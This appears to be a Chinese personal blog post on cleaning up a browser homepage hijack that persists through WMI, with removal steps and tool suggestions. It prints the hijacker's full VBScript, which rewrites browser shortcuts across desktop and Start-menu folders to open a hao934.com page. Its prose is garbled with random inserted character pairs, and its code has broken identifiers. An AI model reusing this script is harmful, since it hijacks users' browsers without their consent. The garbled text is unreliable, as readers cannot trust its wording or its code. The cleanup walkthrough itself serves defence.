前段時間主頁被篡改扳躬，而且電腦還中了其他不同種類的病毒脆诉，已經(jīng)全面覆蓋默認的User+admin權(quán)限用戶，開機閃屏+自動結(jié)束打開任務(wù)等等坦报，當(dāng)時直接注銷用戶库说，采用系統(tǒng)保留用戶administrater用戶登錄，然后安裝360片择，重新全盤掃描潜的，但是對于一個安全新手來說，360清理掉了許多可以正常使用的工具字管，而且許多工具功能也變的殘缺啰挪，只好重裝系統(tǒng)信不。
昨天電腦在此打開了某客的工具包，電腦直接被惡作劇亡呵，不過目前沒發(fā)現(xiàn)什么大礙抽活，重啟后主頁被篡改，又不想使用360锰什，只好手動清理下硕。

首先，我中的瀏覽器
Chrom
firefox

主頁被劫持的原理其實就是通過WMI自動運行的腳本,WMI是windows后臺運行的事件管理器汁胆。

更改WMI就需要下載
https://arlenluo.github.io./images/post6/WMITools.exe

image.png

然后直接點擊okok

image.png

然后右鍵查看這個的屬性

image.png

On Error Resume Next
Const link = "http://hao934.com/?r=gameall&m=a286"
Const link360 = "http://hao934.com/?r=gameall&m=a286&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Username\Desktop,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"

browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")

For Each browser In browsersArr
    oDic.Add LCase(browser), browser
Next  

lnkpathsArr = split(lnkpaths,",")  
Set oFolders = CreateObject("scripting.dictionary")  

For Each lnkpath In lnkpathsArr  
    oFolders.Add lnkpath, lnkpath  
Next  

Set fso = CreateObject("Scripting.Filesystemobject")  
Set WshShell = CreateObject("Wscript.Shell")  
For Each oFolder In oFolders  
    If fso.FolderExists(oFolder) Then  
        For Each file In fso.GetFolder(oFolder).Files  
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then  
                Set oShellLink = WshShell.CreateShortcut(file.Path)  
                path = oShellLink.TargetPath  
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)  
                If oDic.Exists(LCase(name)) Then  
                    If LCase(name) = LCase("360se.exe") Then  
                        oDicShellLink.Arguments = link360  
                    Else  
                        oShellLink.Arguments = link  
                    End If  
                    If file.Attributes And 1 Then  
                        fsoile.Attributes = file.Attributes - 1  
                    End If  
                    oShellLink.Save  
                End If  
            End If  
        Next  
    End If  
Next

現(xiàn)在篡改主頁的代碼大致都是這樣梭姓。理解起來沒什么代難度，不過這個代碼寫的灰常好嫩码，還對360做了特殊處理誉尖。

image.png

而且不能直接刪除。
需要CD到WMI的安裝目錄管理員運行wbemeventviewer.exe
然后需要將桌面和開始菜單铸题，快速啟動欄中的快捷方式刪除

我的桌面和快速啟動欄沒東西
開始菜單目錄
C:\ProgramData\Microsoft\Windows\Start Menu\Programs

image.png

把后面這個去了铡恕，應(yīng)該大部分篡改網(wǎng)頁的腳本小子的方式都能去掉。

不過我這邊修改完以后界面又跳轉(zhuǎn)到了

http://www.2345.com/?36457

繼續(xù)踩坑
在注冊表中的

HKEY_CLASSES_ROOT/CLSID /{871C5380-42A0-1069-A2EA-08002B30309D}/shell/OpenHomePage/Command

查看病毒沒有更改注冊表丢间，(如果有的話雙擊數(shù)據(jù)探熔，將后面的鏈接刪掉)，當(dāng)然我這邊不是這種情況千劈。

另外一種就是木馬了祭刚，懶得找，直接使用adwcleaner程序進行清理墙牌。

如果清理結(jié)束后重新啟動后主頁仍然是2345涡驮，說明肯定是木馬了，而且十分有可能是偽裝型木馬喜滨，就算肉眼找到也不會去懷疑的捉捅，直接使用現(xiàn)在的殺毒軟件就好。
我使用的是360大法寶虽风，當(dāng)然殺毒軟件這個東西殺完毒就卸載棒口，直接采用其中的系統(tǒng)急救箱，強力模式辜膝，自定義掃描无牵，清除系統(tǒng)關(guān)鍵位置(C盤)，關(guān)系的東西記得備份厂抖。
有l(wèi)inux子系統(tǒng)和其他安全工具的記得轉(zhuǎn)移

linux子系統(tǒng)目錄
C:\Users\{user namae}\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu16.04onWindows_79rhkp1fndgsc\LocalState\rootfs

至此茎毁，主流的主頁篡改就這些。
當(dāng)然嫌棄麻煩的可以直接用360的主頁防護+系統(tǒng)急救箱